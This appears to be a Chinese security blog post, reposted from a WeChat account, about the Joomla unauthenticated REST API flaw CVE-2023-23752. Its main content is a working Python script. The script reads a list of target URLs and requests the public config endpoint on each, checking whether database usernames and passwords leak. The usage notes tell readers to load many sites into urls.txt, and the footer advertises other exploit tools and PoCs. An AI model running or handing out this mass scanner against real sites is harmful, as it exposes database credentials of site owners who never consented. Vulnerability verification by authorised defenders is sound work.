Joomla未授权访问漏洞(CVE-2023-23752)验证脚本
2023-4-24 22:23:49 Author: WIN哥学安全(查看原文) 阅读量:25 收藏

!! 🍁副条也精彩,🎄不要错过.

!! 由于微信公众号推送机制改变了,快来星标不迷路!

1免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

2漏洞介绍

Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。Joomla! CMS 版本4.0.0 - 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。

漏洞库链接

https://nvd.nist.gov/vuln/detail/CVE-2023-23752

3影响范围

Joomla! CMS 版本4.0.0 - 4.2.7

4验证脚本

#poc.py
import requests
from colorama import init,Fore
init(autoreset=True)
for urls in open('urls.txt'):
  url=urls.replace('\n','')
# url="https://host"
  headers = {
          'Upgrade-Insecure-Requests''1',
          'User-Agent''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
          'Accept''text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
          'Accept-Encoding''gzip, deflate',
          'Accept-Language''zh-CN,zh;q=0.9',
          'Connection''close'
      }

  payload="/api/index.php/v1/config/application?public=true"
  url1=url+payload
  try:
      res=requests.get(url=url1,headers=headers,timeout=5)

      if 'user' in res.text and 'password' in res.text:
          print(Fore.GREEN +"[+]存在漏洞:"+url1)
      else:
          print("[-]不存在漏洞:"+url1)
  except Exception as e:
      print(Fore.RED +'[!]访问失败:'+url1)

5使用方法

建一个文件夹,里面放poc.py,同级目录下再建一个urls.txt来放大量需要验证的网址,最后直接运行脚本就可以了,脚本写的比较垃,但是正常验证还是可以的,偶尔有误报

Taps:

参考:https://mp.weixin.qq.com/s/moRsWNQp7yOlGL_2uYH4wA

扫码回复“加群”加入交流群

       

往期精彩

工具获取回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以。

快速攻击全自动化工具JuD

Exp-Tools 1.1.3版本发布

GUI-tools渗透测试工具箱框架

阿波罗自动化攻击评估系统

 微软 Word RCE附PoC

Clash最新远程代码执行漏洞(附POC)

禅道系统权限绕过与命令执行漏洞(附POC)

【附EXP】CVE-2022-40684 & CVE-2022-22954

网络安全应急预案合集


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247492072&idx=1&sn=f8f06989758cad661adc1312394e6931&chksm=c0c8401cf7bfc90a56816cabed1c33b33dca2b58fad71d7a7095cd4c28d2719b1e5f47893640#rd
如有侵权请联系:admin#unsafe.sh